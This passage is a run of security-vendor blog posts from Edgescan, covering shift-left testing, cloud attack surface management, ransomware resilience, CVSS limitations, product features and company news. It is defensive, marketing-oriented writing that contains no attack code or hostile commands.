tool-up with cyber security earlier in the development lifecycle, we should get better and more secure product/code. At first glance, this appears logical and totally makes sense: let us prevent things from happening instead of fixing things that have already happened. Shift left testing and validation is designed to prevent the following: Insufficient resources allocated to testing – Insufficient testing. Test earlier and often. Undiscovered defects/errors and design flaws in requirements, architecture, and design, along with significant effort wasted while implementing them. – We’ve always done this to some extent in “waterfall software development” – I’d suggest this is nothing new. Difficult and complex testing which results in reduced code coverage during testing And so on … Has It Worked? I am sure that metrics are available citing the savings, efficiency, training, and awareness of development relating to security vulnerabilities, etc., which all point to the positive. But “the problem,” “the elephant in the room,” “the mini donkey in the cottage,” “place your favorite metaphor here,” is that global metrics point to the fact that things are worse than ever… “It’s the Software, Stupid…” (Software is defined as the following: applications, API, OS, firewall, cloud, load balancers, browsers, web servers, toasters, etc. …) “Secure software only does what it was designed to do. Anything else is weakness.” We can argue about network vs. web application vs. mobile vs. API vs. ransomware vs. bots vs. quantum AI, but the fact remains that threat actors present different problems; breaches are based on different scenarios, and each attack requires a different solution. This is an arguable but fair statement. The method of breach, pivot and exploit is all the based on a couple of weaknesses; Point 1: Logical weaknesses which include poor authentication, poor authorization, poor business logic design; and Point 2: Technical weaknesses which are vulnerabilities in software- those weaknesses which can be exploited via tools, manual knowhow or “commercial grade” exploitation toolkits Point 1 above is due to poor design, peer review, understanding use cases and environment, and lack of awareness of potential threats/risks to the system. We have always had to contend with this. Point 2 is all about the software, stupid. Even though we have “shift left” coursing through our veins, even the biggest and most profitable/experienced enterprises are still producing critically weak systems which are widespread, amplifying the problem. Most of the companies in the enterprise space have adopted a shift left approach which is great, but it certainly cannot be the sole solution to addressing the problem of software insecurity.   Shift left is static: the full stack system is being tested in an environment which does not change around it. Change gives rise to risk: Our environment is always changing. Even in the systems where the developer code is not subject to too much change, the landscapes in which they live are. Vulnerabilities in the browser, the web server, the cryptography, and the firewall all rely on each other and combined, deliver the system solution. Change occurs when: A system does not change: Over time critical vulnerabilities are discovered. Patches are released. Yesterday I was secure, today I’ve a Critical Risk. Need to patch/Redeploy. When a system changes: new features deployed, new services exposed, larger attack surface, more exposed, more to attack, more headaches...   For example, an Enterprise System Defined by Numerous Components. Many of them open-source, third party, with various degrees of secure design and development. A deployment environment developed by a third party, subject to vulnerabilities and human error. A custom web application developed by the enterprise. A firewall, WAF etc., also prone to vulnerabilities, coding errors. A third-party client-side component A B2B service to deliver a function we purchased and built. In 90% of cases, Shift-Left Security would only help assure point 2 above– the developed code. We hope this highlights our main point and have painted a landscape of castles made of sand.... We Need to Shift Left, Right, and Across the Full Stack… Shift Left makes sense when approaching system resilience and developing secure code, but NOT when it comes to effectively measuring a system’s security posture in the wild, where all the components are working in tandem. We need to focus on run-time assessment, using automation for scale and efficiency, but we need accuracy and depth also. Shifting right addresses some of this by virtue of production safe testing of an application in its living environment. We need continuous assessment and attack surface management to continuously monitor the asset, and the environment in which it is deployed…. “Let’s get Shifty…” Let’s discuss how the Edgescan platform can help you! Excerpt: Over the past decade the “shift left” movement has been gaining traction. The premise is that if we tool-up with cyber security earlier in the development lifecycle, we should get better and more secure product/code. At first glance, this appears logical and totally makes sense: let us prevent things from happening instead of fixing things that have already happened. ### Native Cloud Integration For EASM And Vulnerability Management Keeping pace with the continuous flux of cloud deployments – “Edgescan Cloudhook” IT environments are ever-changing and dynamic. New applications, infrastructure and data are often added without the security team’s knowledge which in turn expands the attack surface. Security policies are typically ignored at scale which makes understanding your digital footprint a near-impossible endeavour. Massive multi-tenant and multi-user environments, dynamically allocated resources or simply the sheer number of services to secure will ultimately lead to one or more of the following: Theft of data from a cloud service by threat actors. Incomplete control over user access. Cloud applications being provisioned outside of IT visibility (e.g., shadow IT) Inability to monitor data in transit to and from cloud services, applications and API’s. Inability to prevent the misuse of data or attacks from the “inside”. Lack of team members with the skills to manage cloud security. An overall lack of visibility into the type of data in cloud application storage. Threats and attacks against the cloud application provider. Inability to assess the security of the cloud application provider’s operations. (Don’t presume security isn’t your concern because you are using a 3rd party hosting somewhere else) An Inability to maintain regulatory compliance.   If Your organization is using cloud services, particularly from one of the “big 3”, namely, AWS, AZURE and GCP you first need to identify if they form part of your main security strategy and if not, they should be front and centre. To mitigate cloud computing security risks, there are several best practices that all organizations should work towards, but it all starts with one word “Visibility”. The first step should always be to understand what’s deployed on the public Internet with an External Attack Surface Management (EASM) solution. The Second step is to take that inventory and ensure it is secure and free of vulnerabilities with an full-stack vulnerability management (VM) solution. This is where technology is required particularly for cloud integrations which are vital in plugging the gaps that traditional inventory management tools can miss. Most modern cloud consoles will feature some sort of asset management tool but typically what’s on offer is a basic visibility component. And yes, this is the first step but why not solve multiple problems with one solution? An organization needs to ask itself how its cloud inventory is being monitored by its security tools as it evolves. Can you trust that once a new service is spun up or changes over time, it is automatically scanned for vulnerabilities or exposures? You will find the visibility components of modern cloud providers can be limited with regard to exposure. Having visibility that a cloud endpoint is exists is clearly not enough. An organization needs to understand what’s running on that device, are services in date and most importantly what services are exposed to the wild. Let’s take Phishing for example. In 2020 and 2022 it remains the most common security incident to affect cloud environments. According to statista.com it accounts for 73% of overall attacks. The traditional approach to remediation is to invest heavily in email security and employee security awareness training. While this is important, it’s clear to see that it is a mitigation as opposed to a comprehensive fix. The recommended approach should be to focus on closing the door as opposed to simply employing a doorman. Most ransomware variants rely on a technical aspect and human error. The Technical aspect typically will target exposed services such as RDP, SSH, SMB, FTP, misconfigured firewalls etc. If an organization can understand where they have these types of dangerous services exposed, they can plug the leak “before the pipe bursts”. Cloud integrations or as we like to refer to them “Cloudhook” are connectors designed to accomplish this task. They provide an effective way to automate your cloud security program, particularly as it relates to External Attack Surface Management (EASM) and Vulnerability Management (VM). Edgescan Cloudhook is designed to consolidate both EASM and VM into a unified solution. – Visibility and Vulnerability detection, in real-time as the cloud deployment evolves. As services are spun up and down the Cloudhook should automatically enumerate and inventory an organization’s environment into its ASM and Vulnerability management modules. Automatic security assessment, visibility and exposure detection.   Firstly, let’s look at the unique benefits that a feature-rich EASM solution can offer: Enumerate unknown assets, uniquely identify them, track change and deployment, and automate the analysis of changes in the enterprise’s IT landscape Keep pace in Real-time with changes to the cyber landscape. As the cloud changes it is reflected in both ASM and Vulnerability management automatically. Enterprises need continuous enumeration of cloud/IT weaknesses, exposures and misconfigurations to reduce the risk of data breaches, exposures and privacy non-compliance. Track and control cloud spending by identifying shadow cloud/IT deployments. For users in GRC/Risk Management and privacy functions, ASM helps ensure compliance with security privacy regulations and framework by detecting potential exposures. Again, to hammer it home – Complete Visibility is the cornerstone of a robust security posture. You can’t secure what you don’t know about. With today’s cloud-enabled and rapid development environment, technologies such as Cloudhook must be considered as vital in your security program as running vulnerability scans or penetration tests. However, as an interesting side-step one of the scenarios, I’ve recently witnessed is clients will use EASM and Visibility as a tools to focus on cost-saving or reaching carbon goals. The premise is quite similar. If a service should not be deployed, then take it down. After Exposure has been reviewed and mitigated, the next step is to ensure vulnerability scanning and security testing are taking place, With the Edgescan Cloudhook this happens seamlessly in conjunction with EASM. In conclusion, the takeaway here is that native cloud integrations (CloudHook) are a vital component for any client that is mature in their cyber security posture, or for any client that is undergoing Digital Transformation to the cloud. Don’t be fooled by the suite of tools offered by your hosting provider. Yes, they provide ways to do basic inventory, but the bigger picture of the overall Cloud environment security needs to be considered. A modern competent Security vendor will have the ability to fully automate the various aspects of your cloud security and take away the pain. ### CISA Releases Directives On Asset Discovery And Vulnerability Enumeration On the 4th of October 2022 CISA released a binding operational directive 23-01 for improving asset visibility and vulnerability detection on federal networks. It can be seen here The guidance is robust and focuses on frequency and coverage. It requires federal organisations to do the following, but the recommendations are applicable to all companies. Implementation guidance is here Below is a short mapping of the CISA directive and how Edgescan delivers its features. Chickens come home to roost. It’s clear that this should be a baseline approach to not just federal organisations but a minimum requirement for any business. When we review the past few years, most ransomware attacks were a result of a simple breach of systems like remote working services or unpatched firewalls (Exposed unmanaged services). This approach is an attempt to reduce the risk of breach via continuous visibility and vulnerability detection. Something Edgescan has been delivering since 2016!! If you want to learn more about Edgescan, click the button below: ### Edgescan Integrations Q4 2022 Integrate or die. Following on from some splendid work by the Edgescan teams throughout 2022, we would like to announce some exciting new ecosystem integrations fresh off the press to finish out 2022. New Ecosystems Integrations ServiceNow Security Incidents: Automate the ingestion of Edgescan vulnerability data into ServiceNow Security Incidents by sending Webhooks directly from Edgescan as soon as they are discovered. AWS (Amazon Web Services): Edgescan can now ingest asset information directly from your AWS instances to automate ASM (Attack Surface Management) & Vulnerability Scanning your external facing services as soon as they become public. Microsoft Azure: Edgescan can now ingest asset information directly from your Azure instances to automate ASM & Vulnerability Scanning your external facing services as soon as they become public. GCP (Google Cloud Platform): Edgescan can now ingest asset information directly from your GCP instances to automate ASM & Vulnerability Scanning your external facing services as soon as they become public. FreshServices: Send vulnerability data directly from Edgescan into FreshServices as a ticket using the native webhooks in Edgescan. PlexTrac: Allow users to pull Edgescan data into their customer reporting formats in PlexTrac. Updated Ecosystems Integrations Kenna: Enhanced support. Brinqa: Enhanced support via the Brinqa platform. Brinqa customers can add data directly from Edgescan into the Brinqa instance. ArmorCode: Enhanced support via the ArmorCode platform. ArmorCode customers can add data directly from Edgescan into their ArmorCode instance. Learn more about Edgescan Integrations and how it can help your organization ### Three Ways To Protect Your Enterprise From Ransomware Ransomware is a real threat to global economies. It is possibly the first case of a cyber issue that has gone mainstream to the point that almost everyone knows what it means and how it can affect people. It causes disruptions to everything from energy to healthcare and civil society, and it shows no signs of stopping. So how did we get here?Data breaches and hacks have traditionally involved an attacker breaching a system, stealing data and leaving by the back door, only to hopefully be discovered shortly after. Think of it as harvesting another person’s field and stealing all their crops.Ransomware, on the other hand, has evolved to where an attacker can plant their own malicious crops in your field (weeds), making the field and harvest unusable and possibly also stealing the existing crops. This change in an attacker’s approach results in long-lasting damage — not just theft, but disruption to systems, expanding the duration of damage to the victim.There are three key ways to be more resilient against ransomware, and although none of them are new, they’re still worth examining: identifying exposed areas of your digital estate, more recently known as attack external surface management (EASM); establishing a regular cadence of vulnerability detection and ensuring accuracy; and making frequent backups of critical data.1. External Attack Surface Management (EASM)Think of EASM as a continuous real-time view of what you own. If you were securing your house, you would make sure every window and door has appropriate locks. Ground floor security may require additional, stronger locks. EASM operates on the same idea. It provides you visibility of what you own and informs you as things change. It should also alert you when a metaphorical door is left open or a window is left unlocked. The idea behind EASM is not new, but it has recently gained traction in the industry. Many ransomware attacks in 2021 were due to an exposed service that was unknown to the victims. Employing an EASM solution would have informed the business of the exposed service, which, in many cases, would have only required a simple fix to mitigate the risk, possibly saving the ransomware victims millions of dollars.If your organization isn’t ready to deploy an EASM solution, consider using open-source tools to scan your external estate such as Nmap, ZMap or Masscan to profile your exposed services. Also, consider using a network vulnerability scanner such as Greenbone/OpenVAS to detect risks. This would be a good start, but it may be difficult to monitor and filter out what is important on a continuous basis.It is well worth the effort to revisit your attack surface to determine what you currently have exposed and act on any anomalies in due course. A cornerstone of cybersecurity is visibility because we cannot protect what we can’t see.2. Regular Cadence And Accuracy Of Vulnerability DetectionThe weaknesses being exploited by active ransomware threat actors are often not new or complex. They can be as old as three to five years. Many high-profile ransomware attacks in 2021 leveraged old vulnerabilities that could have been mitigated.A regular cadence of vulnerability management across the full stack (web applications and infrastructure) would have helped detect such weaknesses. Enterprises need to step up their approach and deliver a more frequent and accurate continuous vulnerability detection program in order to identify risks more quickly and mitigate them faster. Accuracy comes into play here and cannot be understated. Without an accurate solution that only reports validated and real vulnerabilities, IT staff may become overwhelmed with the task of prioritization and validation of real risks to the business. This can result in slower response and waste the finite capacity of the IT or cybersecurity team.3. Backing Up Critical DataWhile this is neither a new idea nor a particularly exciting activity, it is a commonly overlooked measure for improving resilience. Ask yourself the question: “If we have a ransomware breach, can we recover?” You need to understand which data is the most critical to the business. This can be a challenge to some businesses, but once done, you can implement a frequent backup cadence. The frequency of backups has a direct relationship with the level of damage a ransomware attack can incur. Higher frequency backups result in less data lost. Loss of data will stop your business from operating and result in catastrophic damage. I recommend knowing which data is critical to the business and how frequently your backups are occurring. Data should be backed up to a secure off-site location and easily recoverable.ConclusionThere are many more aspects to a robust cybersecurity posture, but starting with the above three points will improve resilience dramatically. Knowing what you need to secure and having continuous visibility of your digital assets are paramount. Enterprises are faced with a determined threat that is constantly looking for weaknesses and exposures, so enterprises need to follow suit. The actions listed above are not effortless, but they can be integrated into business-as-usual activities and become standard operating procedures.It’s important to understand that simple mistakes, bugs or unauthorized changes can result in very damaging outcomes, but in many cases, such risks can be prevented and detected before the bad guys take advantage. Employing an external attack surface management solution for visibility and service exposure knowledge, establishing a regular cadence of vulnerability management to discover risks and prevent breaches and frequently making backups for recovery are vital pillars that will help prevent you from becoming a victim of a ransomware attack.Sign up for a demo to see how Edgescan's approach to managing an effective cybersecurity approach improves your security posture.  ### How Cyber Smart Are You? Edgescan’s Cybersecurity Checklist to Help Improve Your Security Posture With the return of the Pumpkin Spice Latte and the first leaves falling comes also Cybersecurity Month a time to focus on the fundamentals of IT security and to raise awareness on the best practices to keep us safe from cyberattacks and improve your organization's security posture. This year has seen attacks targeting large organisations that many would have considered too big to fail. These security incidents highlighted how, when it comes to security, there might be big and small players, but ultimately all it takes for organisations to have their defences breached is to leave a vulnerability unpatched or for an employee to click on the wrong link. Attacks directed to OT, critical infrastructure, hospitals and government agencies have also highlighted to the public how real the consequences of a cyberattack can be. The attack on Colonial Pipeline created fuel shortages and chaos, while the ransomware that took JBM offline resulted in increased meat prices and panic buying. The physical world is so intertwined with the digital realm that cybersecurity has become everyone’s problem. So, what better time than Cyber Security month, to check that your organisation has all the fundamentals covered and ensure a robust security posture? 1. Do you have an asset inventory? It sounds obvious, but it’s worth repeating: you can’t protect what you didn’t know was there. Anything on the network – even an internet connected vending machine – needs to be accounted for. As IT infrastructures become more complicated, scanning all the assets and knowing what’s there is the first step to ensure that there are no visibility gaps. This has become even more relevant in the context of hybrid working models. Continuous asset scanning allows organisations to account for every machine, every server and every IoT device that needs monitoring. An effective external attack surface management tool provides full visibility to all global assets and shadow risk. 2. How often do you scan for vulnerabilities? There is a right answer to this question, and that’s continuous. New vulnerabilities are discovered on a daily basis, and cybercriminals have become incredibly quick at finding exploits and sharing intelligence on dark web hacking forums. You want to be the first to know if there is a vulnerability in your systems so that it can be patched before it’s exploited. 3. Do you have a patch management policy? Not all vulnerabilities were created equal, and not all the patches are feasibly installed immediately after they are made available. Sometimes installing a patch requires offline time that might impact operations, or a new software version might interfere with other programs in the environment. Critical and high risk vulnerabilities should, of course, be patched as soon as possible, but other vulnerabilities might have mitigations that can delay an update. A patch management policy allows organisations to prioritise which fixes need to be installed immediately. 4. How often do you run security awareness training? Phishing is still among cybercriminals’ favourite tactics to gain a foothold in an organisation’s network. Educating all employees is essential to avoid someone clicking on a malicious link or downloading an attachment that contains malware. One of the mistakes that many organisations make, however, is to underestimate how common spear phishing and BEC scams have become. Many C-level executives don’t attend security awareness training alongside their employees, and this can result in them falling for a carefully crafted phishing email that will allow an attacker to spoof their identity and commit BEC and CEO fraud. Security awareness training should be run on a regular basis, rather than as a one-off and it might be a good idea to introduce incentives for employees who succeed at a phishing exercise and report the malicious message. 5. What is your company’s security culture like? Fostering a company culture that encourages employees to come forward when they think they might have clicked on something malicious or when they think they might have spotted a threat is also an important component: it serves nobody to create fear, it only delays the discovery of an incident. Encouraging all divisions to take an interest in security and inviting security teams to communicate more with the rest of the functions can go a long way to harden the frontline of any organisation’s defences. ### Welcome Mark Meyer Mark Meyer is joining Edgescan as Senior Vice President of World Wide Sales.  Mark has held a variety of sales executive roles during his 25 Years focused in the Cyber Security industry, including time at Microsoft, RiskIQ, ThreatModeler, and almost 9 years at WhiteHat Security.   Throughout his career, Mark has been recognized as a genuine, relationship-oriented sales leader, focusing on customer-centric solutions that drive net-new revenue growth and improve overall competitiveness for security startups specializing in Vulnerability Management, SAST, DAST, Threat Intelligence, and External Attack Surface Management.     “I am joining Edgescan at a pivotal time in the cyber security industry and in the growth of our company.  What I love about our space is that it will always be in its infancy.  Edgescan has an extraordinary reputation, unparalleled customer partnerships, and incomparable employee retention that will help accelerate our growth during this period of vendor consolidation.”   Mark is a graduate of Pace University and lives in New York City.    ### New Edgescan Feature: Self-Service What is Self-Service  Self-Service is a streamlining of the Edgescan onboarding experience. This includes an improved asset creation and asset scanning process capable of supporting the complex configurations associated with both.   Many of these new workflows already existed for the Edgescan penetration testing team. We needed to translate workflows created for seasoned penetration testers into a friendly user-experience so that all Edgescan users can benefit from the updates.   We are ready to offer self-service as a default to all customers from today.    Key benefits  Initiate scan – You can now create an asset and initiate scanning in a matter of seconds Ensuring a quicker time to value with Edgescan’s scanning technology.  Business unit autonomy – You can now grant individual business units the ability to onboard their own assets via the UI reducing organisation maintenance and administration efforts.  License management – Less management overhead with the ability to forecast and export more granular breakdowns of license usage in formats understandable by project managers and finance teams.  Scheduled Exports – Enhanced automation capabilities with set and forget exports, you can now schedule configurable exports and report to be delivered via email at your convenience.  ### New Edgescan Feature: SLA We are excited to announce a brand-new SLA feature that will be added to the Edgescan Platform.    What is a SLA  A service-level agreement (SLA) is an agreement between two or more parties, regarding particular aspects of a service. SLAs can either be legally binding contracts or an informal contract between internal departments or teams.     Edgescan's Approach to SLAs  Edgescan facilitates SLAs governing vulnerability remediation time. A user may set SLAs within the Edgescan application to govern the maximum acceptable remediation time required for their vulnerabilities, and with a remediation time specified by the user at each level of risk associated with a vulnerability. Vulnerabilities that exceed this remediation time, therefore violate their SLA. Vulnerabilities violating SLAs are searchable and subsequent reports have the option to have these vulnerabilities highlighted as SLA violations.    How to setup SLAs SLA settings can be found in the account/settings section by clicking on the highlighted icon of the top right side of the Edgescan webpage:  SLA settings are then accessed by clicking on “SLA settings” in the Account/Settings drop-down menu:  The SLA settings allow 5 separate SLAs to be created and modified, governing the time required to close an open vulnerability at a given level of risk.  SLAs can be created/modified by selecting the edit icon to the right of the relevant risk level:  A form will open that allows users to input the desired remediation time. The time is set by   quantity, immediately followed by specifying the days(d), hours(h), and minutes(m) this represents. Multiple types can be provided by space separation.  e.g., “1d 20h 40m” represents 1 day, 20 hours, and 40 minutes any vulnerability of a given risk can remain open before it is in violation of its SLA.  The SLA value is confirmed by selecting the red tick beside the given SLA. Modification can be cancelled by selecting the “x”, which will revert the SLA to its previous state. An SLA may be removed entirely by clearing the SLA form and confirming the value via the red tick.    Viewing Vulnerabilities with an SLA Violation After SLAs have been set, they can then be viewed in several ways. Using the “SLA Violated” filter on the vulnerabilities homepage allows users to view all vulnerabilities currently violating their associated SLA.  Vulnerability Page  The page for a given vulnerability displays the date when that vulnerability would violate its SLA on the top left.  Reports Open SLA Violations can be viewed in a report in the findings section and are displayed beside risk and identified with “SLA violation”.  Examples on how it can help your team SLAs can help improve your team’s vulnerability management. They enable better prioritization of remediation through goal setting. SLAs allow teams to make visible and transparent commitments to their organization in relation to vulnerability remediation.  Learn more about Edgescan and how it can help your organization     Streamline Response Times with ASM Our new SLA feature is designed to enhance your response times for critical vulnerabilities. With Attack Surface Management (ASM), we help you identify, monitor, and secure your external digital assets. Whether you're in Dublin or New York, we make sure your business stays ahead of potential threats. ### Edgescan Company Day & Awards Last Friday, Edgescan had its first full company day in more than three years! It was awesome to be able to hang out together at Dunboyne Castle and a large number of us had never met in person! ‘Awaydays’ as we call them, have been frequent part of company life since we started, usually doing a few each year, whereby we all come together for the full day and night. Since the last one in March 2019, we have doubled in size and grown our US team substantially - It was lovely to be able to welcome them all and for many it was their first time in Ireland!  Not only did we have a very constructive day in brainstorming and catching up, but we also had our Edgescan awards which two of the main awards are as follow:   Best Sales Rep of the year   Conor Cronin Award - For security operational excellence  We also had a few other awards; however, these were for individual projects internally (It had to do with a Hackathon and pirates – don’t ask!) and client specific projects (such as a project in delivering a large number of pen tests in a very short timeframe).    The first award was for best sales representative this year and the winner was Rodney Jess.  Our next award was the Conor Cronin award, dedicated to the late Conor who worked at Edgescan as a penetration tester. This year we were delighted to present this award to one of our team leads, Patrick Christian. Patrick was nominated and voted for by team members – one of the unsung heros working tirelessly in the background. Congrats Patrick, well deserved!  We are already looking forward to our next big meet-up (most likely the Christmas party, whoop whoop) and to see how our family has once again grown.  ### Why CVSS Just Isn’t Enough Pandemic Causes Enterprises to Pivot from Common Vulnerability Scoring System (CVSS) When COVID-19 shook up the world in 2020, in-person buying opportunities evaporated. If “non-essential” organizations were going to sell or provide services, they would need to do so digitally. Across the world, companies that were forced into rapidly expanding their online presence soon found that CVSS wasn't enough to adequately address the corresponding increase in vulnerabilities. “As lockdowns became the new normal, businesses and consumers “went digital”, providing and purchasing more goods and services online, raising e-commerce’s share of global retail trade from 14% in 2019 to about 17% in 2020. (COVID-19 and e-commerce: a global review, UNCTAD 2021) “Either it should be made be made clear that CVSS reflects severity, not risk, or CVSS must be adjusted to make it reflect risk so users of CVSS can make more informed decisions.” (Towards Improving CVSS, Carnegie Melon (2021)) Rapid Online Expansion Creates a Hacker’s Paradise Attack surfaces rapidly expanded before InfoSec teams could implement new processes to keep their cyber-stack secure. Organizations scrambled to increase their online presence, but budgets had already been established for the year. It wasn't until the following year - when world governments made a push to strengthen cybersecurity processes - that more funds could be allocated. Pre-Allocated Budget Meant the Vulnerability Management Program Could Not Adapt With capped annual Vulnerability Management security budgets, many cyber teams got tied to dated and unscalable processes. Expanded APIs, larger attack surfaces, and new vulnerabilities compounded the issue. What emerged was a fundamentally new problem facing the Enterprise’s Vulnerability Management Program. Answering the Basic Question: Does it Matter? The question that Cyber FTEs need to answer is simple: what is critical to my organization? Organizations need to know what a given vulnerability means for their organization specifically. The tool typically used to answer this question is the CVSS standard scoring. Even post-pandemic, many teams across the globe continue to rely on CVSS scoring alone, and therein lies the problem. They're still not getting an accurate depiction of what is happening in their cyber-stack. CVSS is Not Enough for an Effective Vulnerability Management Program Before the creation of CVSS, vendors across the globe used various systems for critical vulnerability management metrics. However, it was almost impossible to find a correlation between the different platforms used. CVSS was created to solve this problem by establishing a standard risk presumption across organizations that could be tracked uniformly. CVSS scoring is a fantastic tool for assessing generic, non-specific base, temporal and environmental metrics of vulnerability severity. CVSS’s Fundamental Problem: It's a Static Scoring System Organizations need more than a snapshot of their risk posture. Without context, there’s no sure way to understand the specific impact of vulnerabilities. For example, unpatched vulnerabilities with a CVSS score of 4.0 or higher generally have an unfavourable impact on PCI compliance. However, that same vulnerability won’t pose nearly the same risk to a healthcare organization navigating HIPPA compliance regulations. So what is the solution? The answer is risk-based data. Organizations need to know how a vulnerability will affect their particular organization if it’s not remediated or patched promptly. Risk-based data provides context and narrative surrounding vulnerabilities when based on the intricacies of the organization. Organizational context is a defining factor in: determining what a vulnerability truly means to a company allowing for effective prioritization and  optimized workflow for Cyber FTEs ensuring that organizations are focused on what matters. Taking the First Step Away from CVSS Accurate Risk-Based data informing the Vulnerability Management Program is the first step to securing an organization’s cyber-stack. As Gartner puts it “Security and risk leaders should tie vulnerability management practices to their organization’s specific needs, not a mythical standard.” (Gartner, How to Set Practical Time Frames to Remedy Security Vulnerabilities, June 23, 2021) Context is King CVSS is great at what it does (and solves the problem that it was intended to fix). However, an optimized Vulnerability Management Program does not represent reliable risk-based data on its own. Get the most accurate depiction of what is happening within your cyber stack. Find a tool and/or vendor that gives you actionable risk-based data. Ensure that your data alerts provide context, narrative, and a story behind the vulnerabilities that come across your desk. Good hunting ladies and gentlemen. Learn more about leveraging risk-based intelligence for your Vulnerability Management Program. ### Transforming the Vulnerability Management Function How can one achieve the necessary level of insight to be informed on what really matters? Gartner highlights the need for executives to become more agile in their vulnerability management approach and notes the trend to transition away from a centralized function toward a distributed, informed risk decision-making model.   Transitioning from Technical Security to Executive Risk Management “The CISO role has moved from a technical subject matter expert to that of an executive risk manager” (Gartner Identifies Top Security and Risk Management Trends for 2022, March 2022) “Enterprise cybersecurity needs and expectations are maturing, and executives require more agile security amidst an expanding attack surface. Thus, the scope, scale, and complexity of digital business makes it necessary to distribute cybersecurity decisions, responsibility, and accountability across the organization units and away from a centralized function.” (Gartner 2022)   Distributing Decisions - One of the Top 5 Five Security Trends for 2022 “By 2025, a single, centralized cybersecurity function will not be agile enough to meet the needs of digital organizations. CISOs must re-conceptualize their responsibility matrix to empower Boards of Directors, CEOs, and other business leaders to make their own informed risk decisions.” (Gartner Identifies Top Security and Risk Management Trends for 2022, March 2022)   Enabling Smart vulnerability Management Decisions – Five Important Steps Here are five important steps to enable your Enterprise Vulnerability Management office to become an informed executive risk decision maker.   1 - Eliminate the Noise Automated scanners across the full stack generate a significant number of false positives. This noise clouds the actual relevant data to make informed decisions. Keep your security staff focused on what matters. Instead of having them manually remove false positives, utilize a Hybrid Vulnerability Management Platform with enterprise security experts in that role.   2 - Get a Single Picture of What Matters Your business leadership audience does not need (or want) a separate vulnerability assessment on each layer of the attack surface. They want a singular, composite view of what vulnerabilities can have an impact on their business. To be informed and decisive, they need the message to be simple and clear. Consider a Vulnerability Management Platform that: a) integrates alerts from all the layers of the full stack (from networking to web applications) and b) provides intelligence on the entire evolving attack surface including the challenging APIs.   3 - Rank Business Risk Alerts The limitations of CVSS are well known and well documented. Ideally, your Smart Vulnerability Management Platform should business-rank each vulnerability alert within the context of your organization. Smart risk management triages severe, high-impact vulnerabilities over high-volume, low-risk alerts.   4 - Verify with Integrated Pen Testing Traditional penetration testing is typically scheduled on the calendar for a finite number of times per year. But to make truly informed risk-based decisions, real vulnerabilities and their fixes need to be validated as they occur. An integrated on-demand pen testing service facilitates issue detection, remediation, and validation – all in one seamless efficient vulnerability management process.   5 - Integrate Risk Communication into Your Audience Systems Your Vulnerability Management Platform may currently give you a single dashboard of Vulnerability Business Risk Exposure. But is it accessible to your business decision makers and IT support team? Real-time integration into your risk management and ticketing systems enables them to make daily quick and conclusive decisions. Fortunately, leading Vulnerability Management Platforms now come pre-baked with integration into most major Enterprise IT and Risk systems. This is not a “nice to have” convenience feature. It is essential to positively impact remediation times. Only a day-to-day workflow integration can provide actionable visibility to your IT operations staff and business leadership team.   Smart Vulnerability Management Enables Informed Risk Management Decisions Informed risk managers use a single touchstone of prioritized high-risk alerts free of false positives across the entire attack surface. Ideally, this touchstone is integrated into the daily workflow of Security, Business Leadership, and IT functions. While Gartner predicts that most Enterprises will pivot to this model by 2025, it is imperative that leaders in this most relevant field do not fall behind. Taking these five steps to enable informed risk management decisions should be a priority in 2022. Learn Why Smart Vulnerability Management Matters by downloading our whitepaper. ### Keeping Your Wizards: Onboarding and Retaining Cybersecurity Staff How do we keep our Wizards? I’m not referring to the spell-casting, long-bearded, dungeons and dragons characters. I’m referring to those invaluable cybersecurity staff members in your Security Operations Center (SOC) who handle your most critical responsibilities and tasks. These are the heroes that make an impact within your organization by managing crucial remediations, code changes, or risk analysis. You can't afford to lose these InfoSec superstars. If your wizards disappear, so does their institutional knowledge. That's an immediate, painful, and potentially disruptive void to refill.   Cybersecurity Staffing: A Real Business Concern Consider these findings made in 2022: “About one million people work in cybersecurity in the U.S., but there are nearly 600,000 unfilled positions.” The Philadelphia Inquirer (2002) And the situation is not getting better... “In the last 12 months, job openings have increased 29%, more than double the rate of growth between 2018 and 2019.” Gartner TalentNeuron (2022) But the most telling metric is how staffing shortage impacts actual security vulnerabilities. According to a recent Forbes report (April 22, 2022): “Continued Security Staff shortages are making businesses more vulnerable to cyberattacks...Talent shortages have a tangible impact on security programs. As colleagues leave and roles stay open, they are struggling to maintain security standards, particularly around compliance and supporting secure development. Vulnerabilities are more likely to slip past undetected, and teams are concerned they’re not ready to respond to cyberattacks.”   The InfoSec Labor Market is Tighter Than Ever Cybersecurity professionals with vetted, practical expertise are in high demand. While online certifications have become extremely popular, CISOs and InfoSec VPs are mostly competing for workers with real hands-on experience. Employers are becoming more aggressive in their efforts to poach skilled cybersecurity workers from other organizations and competitors. So how can you ensure that your wizards – in which you've invested serious time and money – stay with you?   Keep Your Cybersecurity Staff Engaged Employee Fulfillment is Essential for Retention “Employee engagement is an investment we make for the privilege of staying in business,” states Ian Hutchinson, Life & Work Engagement Strategist. We’ve all heard stories of wizards running for greener pastures after they felt like they were being underutilized or under-appreciated. I’m sure many of us have felt the same way in our past (or even current) job positions. For Security Wizards, the most complex, crucial, and challenging work is often the most fulfilling. Make sure that your employees are doing what they were hired to do instead of “donkey work” (as Michael Douglas would put it).   Cybersecurity Staff Pain Points: A Problem-Solving Example Your wizards are spending an inordinate amount of time validating reports and sifting through thousands of results. They're feeling throttled instead of feeling the magic. The CISO removes these relative menial tasks and optimizes workflows to ensure that team members are doing the job they signed up for. Now the wizards can spend their precious time on the critical tasks that excite them to affect real and significant change. With this strategy, you've just improved your risk posture in tandem with employee morale. You've also made it easier for your organization to attract and recruit new wizards.   Bonus Impact on the Rest of the Cybersecurity Team Your wizards will feel more fulfilled and also have the bandwidth to teach the rest of your security staff members. Do other employees in your cybersecurity workforce demonstrate the potential to become a sorcerer themselves? Now wizards can help those rising stars shine! Let your wizards do what they do best to help strengthen your employees' core happiness, progression, and retention. Worst-case scenario? If a wizard vanishes, you'll still have some up-and-coming apprentices who are ready to practice their own cybersecurity magic.   Protect Your Prized Assets Keep your wizards! How can you create the Ideal Security War Room, and also keep your wizards? Learn about Building the Ideal War Room by downloading our free whitepaper. ### RSAC 2023 UPCOMING: 24-27 April 2023 | San Francisco CONFERENCE THEME: Stronger Together In the cybersecurity industry, no one goes it alone. Instead, we build on each other’s diverse knowledge to create the next breakthrough—exchanging ideas, sharing our success stories, and bravely examining our failures. One-on-One Sessions will be available to provide: A dedicated session with an Edgescan Solution Professional Answers to any questions about needs within your particular environment Updates on all about the latest developments of the Edgescan Platform Exclusive gift from Edgescan to take home How to Book a Session We will make a calendar available soon for you to arrange a one-on-one session with your dedicated Edgescan Solution Professional. Exhibit Location TBD Have a Question? Contact our team to learn more about the 